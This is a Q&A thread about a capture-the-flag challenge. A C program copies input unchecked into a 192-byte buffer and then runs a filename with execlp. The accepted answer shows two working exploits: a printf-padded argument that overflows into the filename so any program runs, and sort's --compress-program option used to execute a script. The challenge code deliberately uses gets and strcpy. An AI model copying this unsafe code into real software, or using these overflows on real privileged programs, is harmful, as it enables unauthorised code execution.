# Using sort and/or uniq functions to launch a program

Tags: linux, bash, terminal, c

I'm doing a challenge in which you are supposed to exploit a vulnerability in a program.
This one in specific seems to require the usage of sort and/or uniq to be able to launch a program.
However, I have searched for about a couple of hours on all kind of documentation regarding these functions and I don't see how that is possible.
The files available in the folder are the functions sort and uniq from Linux.

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <libgen.h>

char buffer[192] = "";
char filename[192] = "";


int main(int argc, char *argv[])
{

  if (argv[1]) {
    snprintf(filename, 255, "/home/challenge/%s", basename(argv[1]));
    printf("Checking filename %s\n", filename);
    if (access(filename, X_OK)) {
      fprintf(stderr, "You do not have the permission to execute this file\n");
      return 1;
    }
  }
  else {
    fprintf(stderr, "Please provide the program name\n");
    return 2;
  }

  if (argv[2]) {
    strcpy(buffer, argv[2]);
  }
  else {
    gets(buffer);
  }
  printf("Executing filename %s\n", filename);

  execlp(filename, filename, buffer, (char *)0);

  return 0;
}
```

The goal is to launch a program instead/alongside of doing uniq/sort.
Any ideas?

Comment: Is the question about how to use the `sort` and `uniq` commands, or about how to call them from your C program, or something else...? It's not at all clear what you want us to try and help you with

Comment: I'm not sure I understand that question. Are you trying to exploit `sort` and `uniq` so that they would start another program? If so, are you asking us to solve the challenge for you? Or is there a more specific question hiding here?

Comment: It's about using sort or uniq to execute a file. Launching the program ./program uniq which then prompts you to point to a file to do the function on, but instead of doing that it is required to launch a different program, let's say a personal script.sh

Comment: @aviro Yes I am looking to exploit sort or uniq to start another program. However, after looking through the documentation I still don't know how you would do that.

Comment: Just so I'd understand: You participate in a challenge you're not able to solve, so you're asking us to solve it for you? Isn't it cheating? :)

Comment: I have honestly tried for long enough and would like to do other challenges than to be stuck on this one for forever :P

Comment: The "problem" is how to exploit the program you are given. It takes 2 arguments, the first is supposed to be either "sort" or "uniq" and the second is a filename. Try giving a very long (say something 5 lines long on your screen) second argument to the program. What do you see happen? What happens when you make the second argument shorter or longer? The author of the problem has made some assumptions so it is possible that there is no exploit possible, but that would be unusual.

Comment: It's not clear if the goal is to use `sort` (or `uniq`) to run the code you posted or the other way around; or to run the program and `sort` (or `uniq`) to run yet another program. Note using programs A+B+… to run program Z, while you can simply run Z, is not an exploit. "To exploit a vulnerability in a program" only makes sense if it allows you to run something you cannot normally run; or to run something as a user you cannot normally become. Is any of the programs you can run setuid or setgid? Answering this question may help determine which program can potentially escalate your privileges.

Answer (score 1, accepted):

### Edit

As @icarus mentioned in the comments, you missed the goal of your challenge. The goal is not to exploit `sort` or `uniq`, but to exploit your program. And it's very easy to do that using the [Buffer Overflow Attack](https://en.wikipedia.org/wiki/Buffer_overflow). Your question is more suitable to [stackoverflow.com](https://stackoverflow.com/) and not to this site, but I'll answer anyway.

Notice the size of `buffer` is 192 bytes. But when the `buffer` is being copied from the arguments ( `strcpy(buffer, argv[2]);` ), it doesn't check if the size is indeed 192 bytes, and it will copy the entire second argument, regardless of the size. Since `filename` is located right after `buffer`, everything after the first 192 bytes of the second argument will "overflow" and override the address of the `filename` variable in the memory.

Since the `strcpy` is only performed after checking the that the `filename` exists in `/home/challenge/`, this check will pass successfully, but then it will run whatever comes after the first 192 bytes of the second argument.

```
./challenge sort "`printf '%192s./program.sh'`"
Checking filename /home/challenge/sort
Executing filename ./program.sh
Yes, ./program.sh was indeed executed by sort!
```

Here's another interesting example:

```
$ printf -v ARG "%-191s\n/bin/echo" 'hello world'
$ ./challenge uniq ""$ARG""
Checking filename /home/challenge/uniq
Executing filename /bin/echo
hello world                                                                                                                                                                                    
/bin/echo
```

Using `bash`'s `printf` I assign to the `$ARG` variable a string that begins with "hello world" padded with spaces to reach 191 bytes and then a new line `\n`, followed by `/bin/echo`. It will run `/bin/echo` with the entire `$ARG` as a parameter, the result of which will be "hello world" padded with spaces, a new line and `/bin/echo`.

### Original Answer

I'm not sure if that exactly what you're looking for, but I think I've found a way to do it with `sort`. When the input of `sort` is too high, `sort` is writing data to temporary files in order to save RAM, and eventually merges them.

GNU `sort` also has an option `--compress-program=PROG`, that tells it to compresses the temporary files using `PROG` to save disk space. The idea is to run `sort` with `--compress-program=PROG`, and then keep sending data to the standard input (this time it would be for the standard input of `sort`, after the `execlp`) until `sort` decides to write to a temporary file and use the supplied program to compress it.

First, here's the program we'll try to run. It's just writing some message to the standard error so we could validate it was indeed executed.

```
$ cat program.sh
#!/bin/bash
echo "Yes, $0 was indeed executed by sort!" >&2
exit 1
```

Then we would run the following:

```
while true; do echo; done | ./challenge sort --compress-program=./program.sh
Checking filename /home/challenge/sort
Executing filename /home/challenge/sort
Yes, ./program.sh was indeed executed by sort!
```

Then your code will execute `sort` the following way:

```
execlp("/home/challenge/sort", "/home/challenge/sort", "--compress-program=./program.sh", (char *)0);
```

Which is just like running `/home/challenge/sort --compress-program=./program.sh` in a shell. Next we'll echo empty lines in an infinite `while` loop, and those empty lines will be directed to the STDIN of `sort`. Eventually `sort` would decide to write a temporary file, and it would use `./program.sh` to try to compress it. As you can see, `./program.sh` was indeed executed and wrote to the STDERR: `Yes, ./program.sh was indeed executed by sort!`

That's the only way I could figure out. I couldn't find a way to exploit `uniq`.

Comment: I would have never thought of that and indeed it did work, thanks for the help!

Comment: It seems reasonable to assume they were looking for the buffer overflow attack rather than the incorrect parsing of arguments. I didn't spell out the answer in my comment on the question as I thought learning from a hint is more beneficial than being spoon-fed the answer. There is a good chance that future challenges will build on the knowledge gained. It is not certain that the system will allocate the 192 bytes for the filename variable immediately after the 192 for buffer, this is the assumption I was thinking about.